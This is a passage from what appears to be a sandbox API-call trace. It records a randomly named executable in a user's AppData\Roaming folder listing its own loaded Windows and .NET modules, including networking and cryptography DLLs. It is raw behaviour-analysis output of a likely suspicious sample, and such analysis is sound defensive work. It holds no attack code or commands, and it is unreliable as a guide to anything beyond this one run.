hProcess=0x2a0, hModule=0x73f20000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0145.716] CoTaskMemFree (pv=0x55b0d0) [0145.716] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.716] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f20000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0145.717] CoTaskMemFree (pv=0x55b0d0) [0145.717] GetModuleInformation (in: hProcess=0x2a0, hModule=0x70a50000, lpmodinfo=0x23c4bf4, cb=0xc | out: lpmodinfo=0x23c4bf4*(lpBaseOfDll=0x70a50000, SizeOfImage=0x84000, EntryPoint=0x70a76530)) returned 1 [0145.718] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.718] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x70a50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0145.719] CoTaskMemFree (pv=0x55b0d0) [0145.719] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.719] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x70a50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\DNSAPI.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")) returned 0x1e [0145.720] CoTaskMemFree (pv=0x55b0d0) [0145.720] GetModuleInformation (in: hProcess=0x2a0, hModule=0x713f0000, lpmodinfo=0x23c6d00, cb=0xc | out: lpmodinfo=0x23c6d00*(lpBaseOfDll=0x713f0000, SizeOfImage=0x8000, EntryPoint=0x713f1fc0)) returned 1 [0145.721] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.721] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x713f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0145.723] CoTaskMemFree (pv=0x55b0d0) [0145.723] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.723] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x713f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\WINNSI.DLL" (normalized: "c:\\windows\\syswow64\\winnsi.dll")) returned 0x1e [0145.724] CoTaskMemFree (pv=0x55b0d0) [0145.724] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fa30000, lpmodinfo=0x23c8e0c, cb=0xc | out: lpmodinfo=0x23c8e0c*(lpBaseOfDll=0x6fa30000, SizeOfImage=0x8000, EntryPoint=0x6fa31920)) returned 1 [0145.725] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.725] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fa30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0145.726] CoTaskMemFree (pv=0x55b0d0) [0145.726] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.726] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fa30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")) returned 0x20 [0145.727] CoTaskMemFree (pv=0x55b0d0) [0145.727] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f9e0000, lpmodinfo=0x23caf20, cb=0xc | out: lpmodinfo=0x23caf20*(lpBaseOfDll=0x6f9e0000, SizeOfImage=0x47000, EntryPoint=0x6f9f58d0)) returned 1 [0145.751] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.751] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0145.753] CoTaskMemFree (pv=0x55b0d0) [0145.753] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.753] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")) returned 0x20 [0145.754] CoTaskMemFree (pv=0x55b0d0) [0145.754] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71540000, lpmodinfo=0x23cd034, cb=0xc | out: lpmodinfo=0x23cd034*(lpBaseOfDll=0x71540000, SizeOfImage=0x1b000, EntryPoint=0x71549050)) returned 1 [0145.755] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.755] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71540000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0145.756] CoTaskMemFree (pv=0x55b0d0) [0145.756] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.756] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71540000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0145.758] CoTaskMemFree (pv=0x55b0d0) [0145.758] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fdf0000, lpmodinfo=0x23cf140, cb=0xc | out: lpmodinfo=0x23cf140*(lpBaseOfDll=0x6fdf0000, SizeOfImage=0xa000, EntryPoint=0x6fdf3200)) returned 1 [0145.759] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.759] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0145.760] CoTaskMemFree (pv=0x55b0d0) [0145.760] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.760] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")) returned 0x1f [0145.761] CoTaskMemFree (pv=0x55b0d0) [0145.761] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f970000, lpmodinfo=0x23d124c, cb=0xc | out: lpmodinfo=0x23d124c*(lpBaseOfDll=0x6f970000, SizeOfImage=0x64000, EntryPoint=0x6f98afd0)) returned 1 [0145.762] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.762] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f970000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="schannel.dll") returned 0xc [0145.764] CoTaskMemFree (pv=0x55b0d0) [0145.764] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.764] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f970000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")) returned 0x20 [0145.765] CoTaskMemFree (pv=0x55b0d0) [0145.765] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f90000, lpmodinfo=0x23d3360, cb=0xc | out: lpmodinfo=0x23d3360*(lpBaseOfDll=0x73f90000, SizeOfImage=0x178000, EntryPoint=0x73fe8a90)) returned 1 [0145.766] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.766] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f90000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0145.767] CoTaskMemFree (pv=0x55b0d0) [0145.768] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.768] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f90000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPT32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")) returned 0x1f [0145.769] CoTaskMemFree (pv=0x55b0d0) [0145.769] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764c0000, lpmodinfo=0x23d546c, cb=0xc | out: lpmodinfo=0x23d546c*(lpBaseOfDll=0x764c0000, SizeOfImage=0xe000, EntryPoint=0x764c5410)) returned 1 [0145.770] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.770] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764c0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0145.772] CoTaskMemFree (pv=0x55b0d0) [0145.772] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.772] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764c0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSASN1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")) returned 0x1e [0145.773] CoTaskMemFree (pv=0x55b0d0) [0145.773] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f960000, lpmodinfo=0x23d7578, cb=0xc | out: lpmodinfo=0x23d7578*(lpBaseOfDll=0x6f960000, SizeOfImage=0x10000, EntryPoint=0x6f964600)) returned 1 [0145.775] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.775] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f960000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mskeyprotect.dll") returned 0x10 [0145.777] CoTaskMemFree (pv=0x55b0d0) [0145.777] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.777] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f960000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")) returned 0x24 [0145.778] CoTaskMemFree (pv=0x55b0d0) [0145.778] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f940000, lpmodinfo=0x23d98a8, cb=0xc | out: lpmodinfo=0x23d98a8*(lpBaseOfDll=0x6f940000, SizeOfImage=0x20000, EntryPoint=0x6f94d120)) returned 1 [0145.780] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.780] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f940000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ncrypt.dll") returned 0xa [0145.781] CoTaskMemFree (pv=0x55b0d0) [0145.781] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.781] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f940000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")) returned 0x1e [0145.782] CoTaskMemFree (pv=0x55b0d0) [0145.782] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f910000, lpmodinfo=0x23db9b4, cb=0xc | out: lpmodinfo=0x23db9b4*(lpBaseOfDll=0x6f910000, SizeOfImage=0x2c000, EntryPoint=0x6f92bb10)) returned 1 [0145.784] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.784] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f910000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="NTASN1.dll") returned 0xa [0145.785] CoTaskMemFree (pv=0x55b0d0) [0145.785] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.785] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f910000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NTASN1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")) returned 0x1e [0145.787] CoTaskMemFree (pv=0x55b0d0) [0145.787] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f8f0000, lpmodinfo=0x23ddac0, cb=0xc | out: lpmodinfo=0x23ddac0*(lpBaseOfDll=0x6f8f0000, SizeOfImage=0x1a000, EntryPoint=0x6f8ffa70)) returned 1 [0145.788] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.788] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ncryptsslp.dll") returned 0xe [0145.789] CoTaskMemFree (pv=0x55b0d0) [0145.789] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.790] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")) returned 0x22 [0145.796] CoTaskMemFree (pv=0x55b0d0) [0145.796] CloseHandle (hObject=0x2a0) returned 1 [0145.813] GetCurrentProcessId () returned 0xbb4 [0145.813] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x2a0 [0145.813] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x244b57c, cb=0x100, lpcbNeeded=0x19e600 | out: lphModule=0x244b57c, lpcbNeeded=0x19e600) returned 1 [0145.815] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x244b688, cb=0x200, lpcbNeeded=0x19e600 | out: lphModule=0x244b688, lpcbNeeded=0x19e600) returned 1 [0145.816] GetModuleInformation (in: hProcess=0x2a0, hModule=0x400000, lpmodinfo=0x244b8c8, cb=0xc | out: lpmodinfo=0x244b8c8*(lpBaseOfDll=0x400000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0145.816] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.816] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x400000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x3a [0145.816] CoTaskMemFree (pv=0x55b0d0) [0145.816] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.816] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x400000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe")) returned 0x60 [0145.817] CoTaskMemFree (pv=0x55b0d0) [0145.817] GetModuleInformation (in: hProcess=0x2a0, hModule=0x771d0000, lpmodinfo=0x244dad4, cb=0xc | out: lpmodinfo=0x244dad4*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0145.817] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.817] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x771d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0145.817] CoTaskMemFree (pv=0x55b0d0) [0145.817] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.817] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x771d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0145.817] CoTaskMemFree (pv=0x55b0d0) [0145.817] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f850000, lpmodinfo=0x244fbd8, cb=0xc | out: lpmodinfo=0x244fbd8*(lpBaseOfDll=0x6f850000, SizeOfImage=0x59000, EntryPoint=0x6f860780)) returned 1 [0145.818] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.818] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f850000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0145.818] CoTaskMemFree (pv=0x55b0d0) [0145.818] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.818] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f850000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0145.818] CoTaskMemFree (pv=0x55b0d0) [0145.818] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76720000, lpmodinfo=0x2451ce4, cb=0xc | out: lpmodinfo=0x2451ce4*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0145.818] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.818] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76720000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0145.819] CoTaskMemFree (pv=0x55b0d0) [0145.819] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.819] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76720000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0145.819] CoTaskMemFree (pv=0x55b0d0) [0145.819] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76910000, lpmodinfo=0x2453df8, cb=0xc | out: lpmodinfo=0x2453df8*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0145.819] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.819] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76910000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0145.820] CoTaskMemFree (pv=0x55b0d0) [0145.820] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.820] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76910000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0145.820] CoTaskMemFree (pv=0x55b0d0) [0145.820] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73e50000, lpmodinfo=0x2455f40, cb=0xc | out: lpmodinfo=0x2455f40*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0145.820] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.820] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73e50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0145.820] CoTaskMemFree (pv=0x55b0d0) [0145.820] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.821] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73e50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0145.821] CoTaskMemFree (pv=0x55b0d0) [0145.821] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76600000, lpmodinfo=0x245804c, cb=0xc | out: lpmodinfo=0x245804c*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0145.821] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.821] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76600000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0145.821] CoTaskMemFree (pv=0x55b0d0) [0145.822] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.822] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76600000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0145.823] CoTaskMemFree (pv=0x55b0d0) [0145.823] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76a90000, lpmodinfo=0x245a160, cb=0xc | out: lpmodinfo=0x245a160*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0145.824] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.824] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76a90000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0145.824] CoTaskMemFree (pv=0x55b0d0) [0145.824] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.824] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76a90000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0145.824] CoTaskMemFree (pv=0x55b0d0) [0145.824] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76cb0000, lpmodinfo=0x245c26c, cb=0xc | out: lpmodinfo=0x245c26c*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0145.825] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.825] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76cb0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0145.825] CoTaskMemFree (pv=0x55b0d0) [0145.825] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.825] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76cb0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0145.826] CoTaskMemFree (pv=0x55b0d0) [0145.826] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76c00000, lpmodinfo=0x245e3c4, cb=0xc | out: lpmodinfo=0x245e3c4*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0145.826] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.826] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76c00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0145.826] CoTaskMemFree (pv=0x55b0d0) [0145.826] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.826] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76c00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0145.827] CoTaskMemFree (pv=0x55b0d0) [0145.827] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f00000, lpmodinfo=0x24604d0, cb=0xc | out: lpmodinfo=0x24604d0*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0145.827] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.827] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0145.827] CoTaskMemFree (pv=0x55b0d0) [0145.828] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.828] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0145.828] CoTaskMemFree (pv=0x55b0d0) [0145.828] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73ef0000, lpmodinfo=0x24625dc, cb=0xc | out: lpmodinfo=0x24625dc*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0145.828] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.828] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73ef0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0145.829] CoTaskMemFree (pv=0x55b0d0) [0145.829] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.829] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73ef0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0145.829] CoTaskMemFree (pv=0x55b0d0) [0145.829] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76840000, lpmodinfo=0x24646f0, cb=0xc | out: lpmodinfo=0x24646f0*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0145.830] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.830] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0145.830] CoTaskMemFree (pv=0x55b0d0) [0145.830] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.830] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0145.830] CoTaskMemFree (pv=0x55b0d0) [0145.830] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6c430000, lpmodinfo=0x2466824, cb=0xc | out: lpmodinfo=0x2466824*(lpBaseOfDll=0x6c430000, SizeOfImage=0x7d000, EntryPoint=0x6c440db0)) returned 1 [0145.831] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.831] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6c430000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0145.831] CoTaskMemFree (pv=0x55b0d0) [0145.831] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.831] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6c430000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0145.832] CoTaskMemFree (pv=0x55b0d0) [0145.832] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d00000, lpmodinfo=0x246896c, cb=0xc | out: lpmodinfo=0x246896c*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0145.832] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.832] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0145.832] CoTaskMemFree (pv=0x55b0d0) [0145.833] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.833] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0145.833] CoTaskMemFree (pv=0x55b0d0) [0145.833] GetModuleInformation (in: hProcess=0x2a0, hModule=0x762b0000, lpmodinfo=0x246aa78, cb=0xc | out: lpmodinfo=0x246aa78*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0145.833] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.833] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x762b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0145.834] CoTaskMemFree (pv=0x55b0d0) [0145.834] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.834] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x762b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0145.834] CoTaskMemFree (pv=0x55b0d0) [0145.834] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74ab0000, lpmodinfo=0x246cb84, cb=0xc | out: lpmodinfo=0x246cb84*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0145.835] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.835] 